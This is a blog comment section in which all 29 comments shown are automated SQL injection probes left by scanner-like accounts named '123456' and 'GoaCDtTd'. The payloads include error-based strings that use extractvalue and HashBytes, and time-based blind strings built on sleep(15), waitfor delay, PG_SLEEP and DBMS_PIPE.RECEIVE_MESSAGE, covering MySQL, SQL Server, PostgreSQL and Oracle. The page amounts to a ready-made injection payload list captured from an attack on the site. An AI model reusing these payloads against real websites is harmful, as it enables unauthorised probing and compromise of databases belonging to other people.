98 Comments

  1. 123456 says:

    ‘+(43340*42250)+’

  2. 123456 says:

    123456’and/**/extractvalue(1,concat(char(126),md5(1083013979)))and’

  3. 123456 says:

    123456’and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(‘MD5′,’1349458422’)))>’0

  4. 123456 says:

    123456/**/and+3=3

  5. 123456 says:

    123456’/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE(‘u’,8)=’u

  6. GoaCDtTd says:

    if(now()=sysdate(),sleep(15),0)

  7. GoaCDtTd says:

    0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z

  8. GoaCDtTd says:

    0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z

  9. GoaCDtTd says:

    (select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/

  10. GoaCDtTd says:

    -1; waitfor delay ‘0:0:15’ —

  11. GoaCDtTd says:

    -1); waitfor delay ‘0:0:15’ —

  12. GoaCDtTd says:

    1 waitfor delay ‘0:0:15’ —

  13. GoaCDtTd says:

    ogE82jFL’; waitfor delay ‘0:0:15’ —

  14. GoaCDtTd says:

    -5 OR 757=(SELECT 757 FROM PG_SLEEP(15))–

  15. GoaCDtTd says:

    -5) OR 567=(SELECT 567 FROM PG_SLEEP(15))–

  16. GoaCDtTd says:

    -1)) OR 697=(SELECT 697 FROM PG_SLEEP(15))–

  17. GoaCDtTd says:

    6YIY6Xrt’ OR 284=(SELECT 284 FROM PG_SLEEP(15))–

  18. GoaCDtTd says:

    uQXeidP2′) OR 266=(SELECT 266 FROM PG_SLEEP(15))–

  19. GoaCDtTd says:

    E8H0Hw4d’)) OR 899=(SELECT 899 FROM PG_SLEEP(15))–

  20. GoaCDtTd says:

    1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

  21. GoaCDtTd says:

    1’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’

  22. GoaCDtTd says:

    16J4xuDk’; waitfor delay ‘0:0:15’ —

  23. GoaCDtTd says:

    -5 OR 506=(SELECT 506 FROM PG_SLEEP(15))–

  24. GoaCDtTd says:

    -5) OR 655=(SELECT 655 FROM PG_SLEEP(15))–

  25. GoaCDtTd says:

    -1)) OR 494=(SELECT 494 FROM PG_SLEEP(15))–

  26. GoaCDtTd says:

    uY3xbDIV’ OR 994=(SELECT 994 FROM PG_SLEEP(15))–

  27. GoaCDtTd says:

    vhENgT9q’) OR 326=(SELECT 326 FROM PG_SLEEP(15))–

  28. GoaCDtTd says:

    lwgrj2vS’)) OR 894=(SELECT 894 FROM PG_SLEEP(15))–

  29. GoaCDtTd says:

    555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’

Leave a Reply

Your email address will not be published.